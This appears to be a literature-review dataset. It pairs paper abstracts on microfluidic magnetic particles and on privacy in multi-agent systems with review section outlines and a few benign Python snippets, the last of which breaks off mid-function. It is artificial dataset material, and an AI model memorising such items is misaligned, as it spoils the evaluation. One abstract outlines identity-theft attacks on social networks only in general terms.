analyzed when subjected to different fluid conditions. The resonant frequency of a clamped circular membrane is found to be 138.11 Hz, neglecting the fluid. For a gas load, the frequency shifts slightly to 104.76 Hz, and it is significantly reduced to 5.53 Hz when a liquid load is applied. The resonant frequency strongly affects the flow rate of the pump; hence, frequency-dependent characteristics of both single-chamber and dual-chamber configuration micropumps were investigated. It was observed that, although the fluid capacity is doubled for the latter, the maximum flow rate was found to be around 27.73 μl/min under 0.4-A input current with an excitation frequency of 3 Hz. This is less than twice the flow rate of a single chamber of 19.61 μl/min tested under the same current but with an excitation frequency of 4.36 Hz. The proposed analytical solution for the double-chamber model, combined with optimization of the nozzle/diffuser design and inclusion of damping effects, proved to be an effective tool in predicting micropump performance and flow-rate delivery. --- paper_title: Design parameters for magneto-elastic soft actuators paper_content: Novel soft actuators can be designed from ferrogels by combining the elastic behavior of a polymer matrix with the magnetic properties of a magnetic filler. A thorough understanding of the mechanical behavior of ferrogel actuation is essential for optimizing actuator performance.
For actuation by linear magnetostriction, the influence of geometrical parameters on the onset and magnitude of hysteretic loss, the range of the continuous deformation ratio, the rate of change of the deformation ratio with respect to the field strength, and the saturation elongation were modeled. These results demonstrate that geometrical design parameters such as specimen length, aspect ratio, and distance from the magnetic field source can be used to tune the performance of ferrogels. --- paper_title: Analysis and fabrication of patterned magnetorheological elastomers paper_content: This paper presents the analysis, fabrication and characterization of patterned magnetorheological (MR) elastomers. By taking into account the local magnetic field in MREs and the particle interaction magnetic energy, the magnetic-field-dependent mechanical properties of MREs with lattice and BCC structures were theoretically analyzed and numerically simulated. Soft magnetic particles were assembled in a polydimethylsiloxane (PDMS) matrix to fabricate new MR elastomers with uniform lattice and BCC structures, which were observed under a microscope. The field-dependent moduli of the new MR elastomers were characterized by using a parallel-plate MR rheometer. The experimental results agreed well with the numerical simulations. --- paper_title: An integrated micro-chip for rapid detection of magnetic particles paper_content: This paper proposes an integrated micro-chip for the manipulation and detection of magnetic particles (MPs). A conducting ring structure is used to manipulate MPs toward giant magnetoresistance (GMR) sensing elements for rapid detection. The GMR sensor is fabricated in a horseshoe shape in order to detect the majority of MPs that are trapped around the conducting structure. The GMR sensing elements are connected in a Wheatstone bridge circuit topology for optimum noise suppression. Full fabrication details of the micro-chip, characterization of the GMR sensors, and experimental results with MPs are presented in this paper. Experimental results showed that the micro-chip can detect MPs from low-concentration samples after they were guided toward the GMR sensors by applying current to the conducting ring structure. --- paper_title: Enhanced separation of magnetic and diamagnetic particles in a dilute ferrofluid paper_content: Traditional magnetic field-induced particle separations take place in water-based diamagnetic solutions, where magnetic particles are captured while diamagnetic particles flow through without being affected by the magnetic field. We demonstrate that replacing the diamagnetic aqueous medium with a dilute ferrofluid can significantly increase the throughput of magnetic and diamagnetic particle separation. This enhancement is attributed to the simultaneous positive and negative magnetophoresis of magnetic and diamagnetic particles, respectively, in a ferrofluid. The particle transport behaviors in both ferrofluid- and water-based separations are predicted using an analytical model. --- paper_title: Biosensing utilizing the motion of magnetic microparticles in a microfluidic system paper_content: A study of the design of a compact and inexpensive biosensing device, which can be operated either by primary care personnel or by patients rather than by skilled operators, is presented. The main parts of the proposed device are a microfluidic channel, permanent magnets and functionalized magnetic microparticles.
The innovative aspect of the proposed biosensing method is that it utilizes the volumetric increase of magnetic microparticles when analyte binds to their surface. Their velocity decreases drastically when they are accelerated by an externally applied magnetic force within a microfluidic channel. This effect is utilized to detect the presence of analyte, e.g. microbes. Analytical calculations showed that a decrease in velocity of approximately 23% can be achieved due to the volumetric change of a magnetic microparticle of 1 μm diameter when HIV virions of approximately 0.135 μm are bound to its surface while its magnetic properties are kept the same. Preliminary experiments were carried out utilizing superparamagnetic microparticles coated with streptavidin and polystyrene microparticles coated with biotin. --- paper_title: Cell manipulation with magnetic particles toward microfluidic cytometry paper_content: Magnetic particles have become a promising tool for nearly all major lab-on-a-chip (LOC) applications, from sample capture, purification, enrichment and transport to detection. For biological applications, the use of magnetic particles is especially well established for immunomagnetic separation. There is a great amount of interest in the automation of cell sorting and counting with magnetic particles in LOC platforms. So far, despite great efforts, only a few fully functional LOC devices have been described and further integration is necessary. In this review, we will describe the physics of magnetic cell sorting and counting in LOC formats with a special focus on recent progress in the field. --- paper_title: Microfluidic applications of functionalized magnetic particles for environmental analysis: focus on waterborne pathogen detection paper_content: The continuous surveillance of drinking water is extremely important to provide early warning of contamination and to ensure continuous supplies of healthy drinking water. Isolation and detection of a particular type of pathogen present at low concentration in a large volume of water, concentrating the analyte in a small detection volume, and removing detection-inhibiting factors from the concentrated sample present the three most important challenges for water quality monitoring laboratories. Combining advanced biological detection methods (e.g., nucleic acid-based or immunology-based protocols) with microfluidics and immunomagnetic separation techniques that exploit functionalized magnetic particles has tremendous potential for realization of an integrated system for pathogen detection, in particular of waterborne pathogens. Taking advantage of the unique properties of magnetic particles, faster, more sensitive, and more economical diagnostic assays can be developed that can assist in the battle against microbial pathogenesis. In this review, we highlight current technologies and methods used for realization of magnetic particle-based microfluidic integrated waterborne pathogen isolation and detection systems, which have the potential to comply in the future with regulatory water quality monitoring requirements. --- paper_title: Manipulation and sorting of magnetic particles by a magnetic force microscope on a microfluidic magnetic trap platform paper_content: We have integrated a microfluidic magnetic trap platform with an external magnetic force microscope (MFM) cantilever.
The MFM cantilever tip serves as a magnetorobotic arm that provides a translatable local magnetic field gradient to capture and move magnetic particles with nanometer precision. The MFM electronics have been programmed to sort an initially random distribution of particles by moving them within an array of magnetic trapping elements. We measured the maximum velocity at which the particles can be translated to be 2.2 mm/s ± 0.1 mm/s, which can potentially permit a sorting rate of approximately 5500 particles/min. We determined a magnetic force of 35.3 ± 2.0 pN acting on a 1 μm diameter particle by measuring the hydrodynamic drag force necessary to free the particle. Release of the particles from the MFM tip is made possible by a nitride membrane that separates the arm and magnetic trap elements from the particle solution. This platform has potential applications for magnetic-based sorting, manipulation... --- paper_title: Magnetophoresis of Nanoparticles paper_content: Iron oxide cores of 35 nm are coated with gold nanoparticles so that individual particle motion can be tracked in real time through the plasmonic response using dark-field optical microscopy. Although Brownian and viscous drag forces are pronounced for nanoparticles, we show that magnetic manipulation is possible using large magnetic field gradients. The trajectories are analyzed to separate contributions from the different types of forces. With field gradients up to 3000 T/m, forces as small as 1.5 fN are detected. --- paper_title: Manipulation of magnetic particles by patterned arrays of magnetic spin-valve traps paper_content: A novel platform for microfluidic manipulation of magnetic particles is discussed. The particles are confined by an array of magnetic spin valves with bistable ferromagnetic “ON” and antiferromagnetic “OFF” net magnetization states. The switchable fringing fields near the spin-valve traps can be used to selectively confine or release particles for transport or sorting. Spin-valve traps may potentially be used as magnetic molecular tweezers or adapted to a low-power magnetic random access memory (MRAM) switching architecture for massively parallel particle sorting applications. --- paper_title: A model for predicting magnetic particle capture in a microfluidic bioseparator paper_content: A model is presented for predicting the capture of magnetic micro/nano-particles in a bioseparation microsystem. This bioseparator consists of an array of conductive elements embedded beneath a rectangular microfluidic channel. The magnetic particles are introduced into the microchannel in solution, and are attracted and held by the magnetic force produced by the energized elements. Analytical expressions are obtained for the dominant magnetic and fluidic forces on the particles as they move through the microchannel. These expressions are included in the equations of motion, which are solved numerically to predict particle trajectories and capture time. This model is well-suited for parametric analysis of particle capture taking into account variations in particle size, material properties, applied current, microchannel dimensions, fluid properties, and flow velocity. --- paper_title: Combined microfluidic-micromagnetic separation of living cells in continuous flow.
paper_content: This paper describes a miniaturized, integrated, microfluidic device that can pull molecules and living cells bound to magnetic particles from one laminar flow path to another by applying a local magnetic field gradient, and thus selectively remove them from flowing biological fluids without any wash steps. To accomplish this, a microfabricated high-gradient magnetic field concentrator (HGMC) was integrated at one side of a microfluidic channel with two inlets and outlets. When magnetic micro- or nano-particles were introduced into one flow path, they remained limited to that flow stream. In contrast, when the HGMC was magnetized, the magnetic beads were efficiently pulled from the initial flow path into the collection stream, thereby cleansing the original fluid. Using this microdevice, living E. coli bacteria bound to magnetic nanoparticles were efficiently removed from flowing solutions containing densities of red blood cells similar to that found in blood. Because this microdevice allows large numbers of beads and cells to be sorted simultaneously, has no capacity limit, and does not lose separation efficiency as particles are removed, it may be especially useful for separations from blood or other clinical samples. This on-chip HGMC-microfluidic separator technology may potentially allow cell separations to be carried out in the field outside of hospitals and clinical laboratories. --- paper_title: Rare cell separation and analysis by magnetic sorting. paper_content: The separation and/or isolation of rare cells using magnetic forces is commonly used and growing in use, ranging from simple sample preparation for further studies to an FDA-approved clinical diagnostic test. This growth is the result of both the demand to obtain homogeneous rare cells for molecular analysis and the dramatic increases in the power of permanent magnets that even allow the separation of some unlabeled cells based on intrinsic magnetic moments, such as malaria parasite-infected red blood cells. --- paper_title: On-chip bio-analyte detection utilizing the velocity of magnetic microparticles in a fluid paper_content: A biosensing principle utilizing the motion of suspended magnetic microparticles in a microfluidic system is presented. The system utilizes the innovative concept of the velocity dependence of magnetic microparticles (MPs) due to their volumetric change when analyte is attached to their surface via antibody–antigen binding. When the magnetic microparticles are attracted by a magnetic field within a microfluidic channel their velocity depends on the presence of analyte. Specifically, their velocity decreases drastically when the magnetic microparticles are covered by (nonmagnetic) analyte (LMPs) due to the increased drag force in the opposite direction to that of the magnetic force. Experiments were carried out as a proof of concept. A promising 52% decrease in the velocity of the LMPs in comparison to that of the MPs was measured when both of them were accelerated inside a microfluidic channel using an external permanent magnet. The presented biosensing methodology offers a compact and integrated solution... ---
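The velocity-based detection principle described in the biosensing entries above can be checked with a back-of-the-envelope Stokes-drag estimate. The sketch below is only an illustration of that reasoning, not the authors' model: it assumes the magnetophoretic force on the bead is unchanged by binding (as stated in the earlier biosensing abstract) and that the bead moves at its Stokes terminal velocity, so the fractional velocity drop follows directly from the growth of the hydrodynamic radius; the force and viscosity values are assumed for illustration.

```python
import math

def stokes_velocity(force_N, radius_m, viscosity_Pa_s=1.0e-3):
    """Terminal velocity of a sphere dragged through a fluid: v = F / (6*pi*eta*r)."""
    return force_N / (6.0 * math.pi * viscosity_Pa_s * radius_m)

# Illustrative numbers taken from the biosensing abstracts above: a 1 um magnetic
# bead with ~0.135 um HIV virions bound to its surface, magnetic force unchanged.
F_mag = 35e-12                  # N, assumed constant magnetophoretic force
r_bare = 0.5e-6                 # m, bare bead radius (1 um diameter)
r_loaded = r_bare + 0.135e-6    # m, effective radius with a bound virion layer

v_bare = stokes_velocity(F_mag, r_bare)
v_loaded = stokes_velocity(F_mag, r_loaded)
drop = 1.0 - v_loaded / v_bare
print(f"bare bead:   {v_bare * 1e3:.2f} mm/s")
print(f"loaded bead: {v_loaded * 1e3:.2f} mm/s")
print(f"velocity decrease: {drop:.0%}")
```

Under these simplifications the predicted decrease is about 21%, the same order as the ~23% reported above; the exact figure depends on how the bound layer is assumed to change the effective hydrodynamic radius.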
Title: Applications of Micro/Nanoparticles in Microfluidic Sensors: A Review Section 1: Introduction Description 1: Introduce the concept of lab-on-a-chip (LOC) systems and discuss the role of microfluidics and nanofluidics, highlighting the importance of micro/nanoparticles. Section 2: Design and Fabrication of PDMS-Based Conducting Composites Description 2: Discuss the integration of conducting particles into PDMS to create conducting composites and their applications in microfluidic devices. Section 3: GERF Application in Microfluidics Description 3: Explain the use of Giant Electrorheological Fluid (GERF) in microfluidic applications such as actuators, valves, and logic control. Section 4: Particles' Electric Force in Microfluidic Channels Description 4: Describe the electric forces acting on particles in microfluidic channels, including electrophoretic and dielectrophoretic forces, and their applications. Section 5: Design and Fabrication of Magnetic PDMS Composites Description 5: Detail the fabrication of magnetic PDMS composites by incorporating magnetic nanoparticles and their applications in microfluidic devices. Section 6: Particles' Magnetic Force in Microfluidic Channels Description 6: Outline the manipulation of magnetic particles in microfluidic channels using external magnetic fields and their applications. Section 7: Conclusions Description 7: Summarize the key points discussed in the paper regarding the use of particles in microfluidic systems, their behaviors, and potential applications.
A survey of privacy in multi-agent systems
17
--- paper_title: A Taxonomy of Privacy paper_content: Privacy is a concept in disarray. Nobody can articulate what it means. As one commentator has observed, privacy suffers from an embarrassment of meanings. Privacy is far too vague a concept to guide adjudication and lawmaking, as abstract incantations of the importance of privacy do not fare well when pitted against more concretely-stated countervailing interests. In 1960, the famous torts scholar William Prosser attempted to make sense of the landscape of privacy law by identifying four different interests. But Prosser focused only on tort law, and the law of information privacy is significantly more vast and complex, extending to Fourth Amendment law, the constitutional right to information privacy, evidentiary privileges, dozens of federal privacy statutes, and hundreds of state statutes. Moreover, Prosser wrote over 40 years ago, and new technologies have given rise to a panoply of new privacy harms. A new taxonomy to understand privacy violations is thus sorely needed. This article develops a taxonomy to identify privacy problems in a comprehensive and concrete manner. It endeavors to guide the law toward a more coherent understanding of privacy and to serve as a framework for the future development of the field of privacy law. --- paper_title: Network Security Essentials: Applications and Standards paper_content: From the book's preface: In this age of electronic connectivity, of viruses and hackers, of electronic eavesdropping and electronic fraud, network security has assumed increasing importance. Two trends have come together to make the topic of this book of vital interest. First, the explosive growth in computer systems and their interconnections via networks has increased the dependence of both organizations and individuals on the information stored and communicated using these systems. This, in turn, has led to a heightened awareness of the need to protect data and resources from disclosure, to guarantee the authenticity of data and messages, and to protect systems from network-based attacks. Second, the disciplines of cryptography and network security have matured, leading to the development of practical, readily available applications to enforce network security. Objectives: It is the purpose of this book to provide a practical survey of network security applications and standards. The emphasis is on applications that are widely used on the Internet and for corporate networks, and on standards, especially Internet standards, that have been widely deployed. Intended Audience: The book is intended for both an academic and a professional audience. As a textbook, it is intended for a one-semester undergraduate course on network security for computer science, computer engineering, and electrical engineering majors. The book also serves as a basic reference volume and is suitable for self-study. Plan of the Book: The book is organized in three parts: I. Cryptography: A concise survey of the cryptographic algorithms and protocols underlying network security applications, including encryption, hash functions, digital signatures, and key exchange. II. Network Security Applications: Covers important network security tools and applications, including Kerberos, X.509v3 certificates, PGP, S/MIME, IP Security, SSL/TLS, SET, and SNMPv3. III.
System Security: Looks at system-level security issues, including the threat of and countermeasures for intruders and viruses, and the use of firewalls and trusted systems. A more detailed, chapter-by-chapter summary appears at the end of Chapter 1. In addition, the book includes an extensive glossary, a list of frequently used acronyms, and a bibliography. There are also end-of-chapter problems and suggestions for further reading. Internet Services for Instructors and Students: There is a Web page for this book that provides support for students and instructors. The page includes links to relevant sites, transparency masters of figures in the book in PDF (Adobe Acrobat) format, and sign-up information for the book's Internet mailing list. The Web page is at ... --- paper_title: All your contacts are belong to us: automated identity theft attacks on social networks paper_content: Social networking sites have been increasingly gaining popularity. Well-known sites such as Facebook have been reporting growth rates as high as 3% per week. Many social networking sites have millions of registered users who use these sites to share photographs, contact long-lost friends, establish new business contacts and to keep in touch. In this paper, we investigate how easy it would be for a potential attacker to launch automated crawling and identity theft attacks against a number of popular social networking sites in order to gain access to a large volume of personal user information. The first attack we present is the automated identity theft of existing user profiles and sending of friend requests to the contacts of the cloned victim. The hope, from the attacker's point of view, is that the contacted users simply trust and accept the friend request. By establishing a friendship relationship with the contacts of a victim, the attacker is able to access the sensitive personal information provided by them. In the second, more advanced attack we present, we show that it is effective and feasible to launch an automated, cross-site profile cloning attack. In this attack, we are able to automatically create a forged profile in a network where the victim is not registered yet and contact the victim's friends who are registered on both networks. Our experimental results with real users show that the automated attacks we present are effective and feasible in practice. --- paper_title: Anonymous Communications for Mobile Agents paper_content: Anonymous communication techniques are vital for some types of e-commerce applications. There have been several different approaches developed for providing anonymous communication over the Internet. In this paper, we review key techniques for anonymous communication and describe an alternate anonymous networking approach based on agile agents intended to provide anonymous communication protection for mobile agent systems. --- paper_title: The Right to Privacy paper_content: That the individual shall have full protection in person and in property is a principle as old as the common law; but it has been found necessary from time to time to define anew the exact nature and extent of such protection. Political, social, and economic changes entail the recognition of new rights, and the common law, in its eternal youth, grows to meet the new demands of society. Thus, in very early times, the law gave a remedy only for physical interference with life and property, for trespasses vi et armis.
Then the "right to life" served only to protect the subject from battery in its various forms; liberty meant freedom from actual restraint; and the right to property secured to the individual his lands and his cattle. Later, there came a recognition of man's spiritual nature, of his feelings and his intellect. Gradually the scope of these legal rights broadened; and now the right to life has come to mean the right to enjoy life, -the right to be let alone; the right to liberty secures the exercise of extensive civil privileges; and the term "property" has grown to comprise every form of possession -intangible, as well as tangible. --- paper_title: Privacy and Artificial Agents, or, Is Google Reading My Email? paper_content: We investigate legal and philosophical notions of privacy in the context of artificial agents. Our analysis utilizes a normative account of privacy that defends its value and the extent to which it should be protected: privacy is treated as an interest with moral value, to supplement the legal claim that privacy is a legal right worthy of protection by society and the law. We argue that the fact that the only entity to access my personal data (such as email) is an artificial agent is irrelevant to whether a breach of privacy has occurred. What is relevant are the capacities of the agent: what the agent is both able and empowered to do with that information. We show how concepts of legal agency and attribution of knowledge gained by agents to their principals are crucial to understanding whether a violation of privacy has occurred when artificial agents access users' personal data. As natural language processing and semantic extraction used in artificial agents become increasingly sophisticated, so the corporations that deploy those agents will be more likely to be attributed with knowledge of their users' personal information, thus triggering significant potential legal liabilities. --- paper_title: A study of preferences for sharing and privacy paper_content: We describe studies of preferences about information sharing aimed at identifying fundamental concerns with privacy and at understanding how people might abstract the details of sharing into higher-level classes of recipients and information that are treated similarly. Thirty people specified what information they are willing to share with whom. Although people vary in their overall level of comfort in sharing, we identified key classes of recipients and information. Such abstractions highlight the promise of developing expressive controls for sharing and privacy. --- paper_title: Unpacking "privacy" for a networked world paper_content: Although privacy is broadly recognized as a dominant concern for the development of novel interactive technologies, our ability to reason analytically about privacy in real settings is limited. A lack of conceptual interpretive frameworks makes it difficult to unpack interrelated privacy issues in settings where information technology is also present. Building on theory developed by social psychologist Irwin Altman, we outline a model of privacy as a dynamic, dialectic process. We discuss three tensions that govern interpersonal privacy management in everyday life, and use these to explore select technology case studies drawn from the research literature. These suggest new ways for thinking about privacy in socio-technical environments as a practical matter.
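The two preference studies above suggest that people group recipients and information types into classes that are treated alike. Purely as an illustration of how such abstractions could be encoded (the class names and rules below are hypothetical, not taken from those studies), a sharing policy can be represented as a small default-deny lookup table that an interface or agent consults before disclosing an item:

```python
# Hypothetical classes of recipients and information types; the studies above
# report that such groupings exist, but these particular labels are invented.
sharing_policy = {
    # info class -> recipient classes allowed to see it
    "location":        {"spouse", "close_friend"},
    "calendar":        {"spouse", "close_friend", "colleague"},
    "health":          {"spouse"},
    "contact_details": {"spouse", "close_friend", "colleague"},
}

def may_disclose(info_class: str, recipient_class: str) -> bool:
    """Default-deny lookup: disclose only if the policy explicitly allows it."""
    return recipient_class in sharing_policy.get(info_class, set())

assert may_disclose("calendar", "colleague")
assert not may_disclose("health", "public")
```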
--- paper_title: Advances in Artificial Intelligence for Privacy Protection and Security paper_content: In this book, we aim to collect the most recent advances in artificial intelligence techniques (i.e. neural networks, fuzzy systems, multi-agent systems, genetic algorithms, image analysis, clustering, etc.), which are applied to the protection of privacy and security. The symbiosis between these fields leads to a pool of invigorating ideas, which are explored in this book. On the one hand, individual privacy protection is a hot topic and must be addressed in order to guarantee the proper evolution of a modern society. On the other, security can invade individual privacy, especially after the appearance of new forms of terrorism. In this book, we analyze these problems from a new point of view. --- paper_title: Privacy, economics, and price discrimination on the Internet paper_content: The rapid erosion of privacy poses numerous puzzles. Why is it occurring, and why do people care about it? This paper proposes an explanation for many of these puzzles in terms of the increasing importance of price discrimination. Privacy appears to be declining largely in order to facilitate differential pricing, which offers greater social and economic gains than auctions or shopping agents. The thesis of this paper is that what really motivates commercial organizations (even though they often do not realize it clearly themselves) is the growing incentive to price discriminate, coupled with the increasing ability to price discriminate. It is the same incentive that has led to the airline yield management system, with a complex and constantly changing array of prices. It is also the same incentive that led railroads to invent a variety of price and quality differentiation schemes in the 19th century. Privacy intrusions serve to provide the information that allows sellers to determine buyers' willingness to pay. They also allow monitoring of usage, to ensure that arbitrage is not used to bypass discriminatory pricing. Economically, price discrimination is usually regarded as desirable, since it often increases the efficiency of the economy. That is why it is frequently promoted by governments, either through explicit mandates or through indirect means. On the other hand, price discrimination often arouses strong opposition from the public. There is no easy resolution to the conflict between sellers' incentives to price discriminate and buyers' resistance to such measures. The continuing tension between these two factors will have important consequences for the nature of the economy. It will also determine which technologies will be adopted widely. Governments will likely play an increasing role in controlling pricing, although their roles will continue to be ambiguous. Sellers are likely to rely to an even greater extent on techniques such as bundling that will allow them to extract more consumer surplus and also to conceal the extent of price discrimination. Micropayments and auctions are likely to play a smaller role than is often expected. In general, because of strong conflicting pressures, privacy is likely to prove an intractable problem that will be prominent on the public agenda for the foreseeable future. --- paper_title: Electronic Agents and Privacy: A Cyberspace Odyssey 2001 paper_content: In this paper, analysis is carried out of the impact of the use of electronic agents on privacy and related interests.
A preliminary examination is made of the various risks to privacy occasioned by agent operations and of the way in which current data protection rules can mitigate these risks. It is suggested that greater thought be given to drafting data protection rules that take full account of electronic agents. 1. Visions of agents Gareth Morgan has persuasively shown that we tend to view and understand organisations using various metaphorical images that often work at a subconscious, intuitive level. The same point can be made with respect to electronic agents. Concomitantly, how we perceive the impact of electronic agents on privacy will tend to be shaped in part by certain visions of what electronic agents are and are capable of becoming. As Morgan correctly shows in relation to organisations, such visions are not just interpretive constructs; they also provide frameworks for policy and action, including law making. Thus, when analysing the interrelationship of electronic agents and privacy, we must not lose sight of the influence of these images. Of the various visions of electronic agents which appear to dominate public discourse, two deserve to be singled out for special attention in light of the theme of this paper. The first vision is that of the electronic agent as ‘digital secretary’ and/or ‘digital butler’. This image depicts the agent as subservient and beneficent in relation to its users and indeed wider society. --- paper_title: Engineering Privacy paper_content: In this paper we integrate insights from diverse islands of research on electronic privacy to offer a holistic view of privacy engineering and a systematic structure for the discipline's topics. First we discuss privacy requirements grounded in both historic and contemporary perspectives on privacy. We use a three-layer model of user privacy concerns to relate them to system operations (data transfer, storage and processing) and examine their effects on user behavior. In the second part of the paper we develop guidelines for building privacy-friendly systems.
We distinguish two approaches: "privacy-by-policy" and "privacy-by-architecture." The privacy-by-policy approach focuses on the implementation of the notice and choice principles of fair information practices (FIPs), while the privacy-by-architecture approach minimizes the collection of identifiable personal data and emphasizes anonymization and client-side data storage and processing. We discuss both approaches with a view to their technical overlaps and boundaries as well as to economic feasibility. The paper aims to introduce engineers and computer scientists to the privacy research domain and provide concrete guidance on how to design privacy-friendly systems. --- paper_title: Agent Technology for e-Commerce paper_content: List of Figures. List of Tables. Preface. 1 Introduction. 1.1 A paradigm shift. 1.2 Electronic commerce. 1.3 Agents and e-commerce. 1.4 Further reading. 1.5 Exercises and topics for discussion. 2 Software agents. 2.1 Characteristics of agents. 2.2 Agents as intentional systems. 2.3 Making decisions. 2.4 Planning. 2.5 Learning. 2.6 Agent architectures. 2.7 Agents in perspective. 2.8 Methodologies and languages. 2.9 Further reading. 2.10 Exercises and topics for discussion. 3 Multi-agent systems. 3.1 Characteristics of multi-agent systems. 3.2 Interaction. 3.3 Agent communication. 3.4 Ontologies. 3.5 Cooperative problem solving. 3.6 Virtual organisations as multi-agent systems. 3.7 Infrastructure requirements for open multi-agent systems. 3.8 Further reading. 3.9 Exercises and topics for discussion. 4 Shopping Agents. 4.1 Consumer buying behaviour model. 4.2 Comparison shopping. 4.3 Working for the user. 4.4 How shopping agents work. 4.5 Limitations and issues. 4.6 Further reading. 4.7 Exercises and topics for discussion. 5 Middle agents. 5.1 Matching. 5.2 Classification of middle agents. 5.3 Describing capabilities. 5.4 LARKS. 5.5 OWL-S. 5.6 Further reading. 5.7 Exercises and topics for discussion. 6 Recommender systems. 6.1 Information needed. 6.2 Providing recommendations. 6.3 Recommendation technologies. 6.4 Content-based filtering. 6.5 Collaborative filtering. 6.6 Combining content and collaborative filtering. 6.7 Recommender systems in e-commerce. 6.8 A note on personalization. 6.9 Further reading. 6.10 Exercises and topics for discussion. 7 Elements of strategic interaction. 7.1 Elements of Economics. 7.2 Elements of Game Theory. 7.3 Further reading. 7.4 Exercises and topics for discussion. 8 Negotiation I. 8.1 Negotiation protocols. 8.2 Desired properties of negotiation protocols. 8.3 Abstract architecture for negotiating agents. 8.4 Auctions. 8.5 Classification of auctions. 8.6 Basic auction formats. 8.7 Double auctions. 8.8 Multi-attribute auctions. 8.9 Combinatorial auctions. 8.10 Auction platforms. 8.11 Issues in practical auction design. 8.12 Further reading. 8.13 Exercises and topics for discussion. 9 Negotiation II. 9.1 Bargaining. 9.2 Negotiation in different domains. 9.3 Coalitions. 9.4 Applications of coalition formation. 9.5 Social choice problems. 9.6 Argumentation. 9.7 Further reading. 9.8 Exercises and topics for discussion. 10 Mechanism design. 10.1 The mechanism design problem. 10.2 Dominant strategy implementation. 10.3 The Gibbard-Satterthwaite Impossibility Theorem. 10.4 The Groves-Clarke mechanisms. 10.5 Mechanism design and computational issues. 10.6 Further reading. 10.7 Exercises and topics for discussion. 11 Mobile agents. 11.1 Introducing mobility. 11.2 Facilitating mobility. 11.3 Mobile agent systems. 11.4 Aglets. 
11.5 Mobile agent security. 11.6 Issues on mobile agents. 11.7 Further reading. 11.8 Exercises and topics for discussion. 12 Trust, security and legal issues. 12.1 Perceived risks. 12.2 Trust. 12.3 Trust in e-commerce. 12.4 Electronic institutions. 12.5 Reputation systems. 12.6 Security. 12.7 Cryptography. 12.8 Privacy, anonymity and agents. 12.9 Agents and the law. 12.10 Agents as legal persons. 12.11 Closing remarks. 12.12 Further reading. 12.13 Exercises and topics for discussion. A Introduction to decision theory. A.2 Making decisions. A.3 Utilities. A.4 Further reading. Bibliography. Index. --- paper_title: Information privacy: measuring individuals' concerns about organizational practices paper_content: Information privacy has been called one of the most important ethical issues of the information age. Public opinion polls show rising levels of concern about privacy among Americans. Against this backdrop, research into issues associated with information privacy is increasing. Based on a number of preliminary studies, it has become apparent that organizational practices, individuals' perceptions of these practices, and societal responses are inextricably linked in many ways. Theories regarding these relationships are slowly emerging. Unfortunately, researchers attempting to examine such relationships through confirmatory empirical approaches may be impeded by the lack of validated instruments for measuring individuals' concerns about organizational information privacy practices. To enable future studies in the information privacy research stream, we developed and validated an instrument that identifies and measures the primary dimensions of individuals' concerns about organizational information privacy practices. The development process included examinations of privacy literature; experience surveys and focus groups; and the use of expert judges. The result was a parsimonious 15-item instrument with four subscales tapping into dimensions of individuals' concerns about organizational information privacy practices. The instrument was rigorously tested and validated across several heterogeneous populations, providing a high degree of confidence in the scales' validity, reliability, and generalizability. --- paper_title: Privacy in e-commerce: examining user scenarios and privacy preferences paper_content: Privacy is a necessary concern in electronic commerce. It is difficult, if not impossible, to complete a transaction without revealing some personal data ‐ a shipping address, billing information, or product preference. Users may be unwilling to provide this necessary information or even to browse online if they believe their privacy is invaded or threatened. Fortunately, there are technologies to help users protect their privacy. P3P (Platform for Privacy Preferences Project) from the World Wide Web Consortium is one such technology. However, there is a need to know more about the range of user concerns and preferences about privacy in order to build usable and effective interface mechanisms for P3P and other privacy technologies. Accordingly, we conducted a survey of 381 U.S. Net users, detailing a range of commerce scenarios and examining the participants' concerns and preferences about privacy. This paper presents both the findings from that study as well as their design implications.
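The 15-item instrument described above scores an individual's concern about organizational privacy practices along four subscales. The snippet below is a generic sketch of how such subscale scores are typically computed by averaging Likert responses per dimension; the item groupings and dimension labels shown here are placeholders, not the validated instrument itself.

```python
from statistics import mean

# Placeholder mapping of questionnaire items (1-7 Likert responses) to concern
# dimensions; the real instrument defines its own items, wording and subscales.
responses = {
    "q1": 6, "q2": 7, "q3": 5,    # e.g. concerns about data collection
    "q4": 4, "q5": 5,             # e.g. concerns about errors in stored data
    "q6": 7, "q7": 6, "q8": 7,    # e.g. unauthorized secondary use
    "q9": 5, "q10": 6,            # e.g. improper access
}
subscales = {
    "collection":      ["q1", "q2", "q3"],
    "errors":          ["q4", "q5"],
    "secondary_use":   ["q6", "q7", "q8"],
    "improper_access": ["q9", "q10"],
}

scores = {name: mean(responses[i] for i in items) for name, items in subscales.items()}
overall = mean(scores.values())
print(scores)
print(f"overall concern: {overall:.2f}")
```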
--- paper_title: An agent‐based privacy‐enhancing model paper_content: Purpose – The purpose of this paper is to discuss a privacy‐enhancing model, which is designed to help web users protect their private information. The model employs a collection of software agents. Privacy‐related decisions are made based on Platform for Privacy Preferences Project (P3P) information collected by the agents. Design/methodology/approach – Based on P3P information collected and user preferences, the software agents play a role in the decision‐making process. This paper presents the design of the agent‐based privacy‐enhancing model and considers the benefits and utility of such an approach. Findings – It is argued that the approach is feasible and it provides an effective solution to the usability limitations associated with P3P. Research limitations/implications – The paper focuses primarily on usability issues related to P3P. Consequently, some of the ancillary security‐related issues that arise are not covered in detail. Also the paper does not cover the development of an appropriate ontolog... --- paper_title: Sensitive Data Transaction in Hippocratic Multi-Agent Systems paper_content: The current evolution of Information Technology leads to the increase of automatic data processing over multiple information systems. The data we deal with concerns sensitive information about users or groups of users. A typical problem in this context concerns the disclosure of confidential identity data. To tackle this difficulty, we consider in this paper the context of Hippocratic Multi-Agent Systems (HiMAS), a model designed for privacy management. In this context, we propose a common content language combining meta-policies and application context data on the one hand and an interaction protocol for the exchange of sensitive data on the other. Based on this proposal, agents providing sensitive data are able to check the compliance of the consumers with the HiMAS principles. The protocol that we propose is validated on a distributed calendar management application.
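In the agent-based P3P model above, user agents compare a service's declared privacy policy with the user's preferences before releasing data. The sketch below is a deliberately coarse stand-in for that comparison; the policy fields, retention levels and preference rules are hypothetical and far simpler than real P3P statements.

```python
from dataclasses import dataclass

RETENTION_ORDER = ["no_retention", "stated_purpose", "indefinite"]

@dataclass
class PolicyStatement:
    """A coarse stand-in for one P3P-like statement declared by a service."""
    data_items: set      # e.g. {"email", "purchase_history"}
    purposes: set        # e.g. {"current_transaction", "marketing"}
    retention: str       # one of RETENTION_ORDER

@dataclass
class UserPreferences:
    blocked_purposes: set    # purposes the user never accepts
    max_retention: str       # most permissive retention the user accepts
    sensitive_items: set     # items never disclosed regardless of policy

def acceptable(stmt: PolicyStatement, prefs: UserPreferences) -> bool:
    """Return True if the user agent may release the requested data items."""
    if stmt.data_items & prefs.sensitive_items:
        return False
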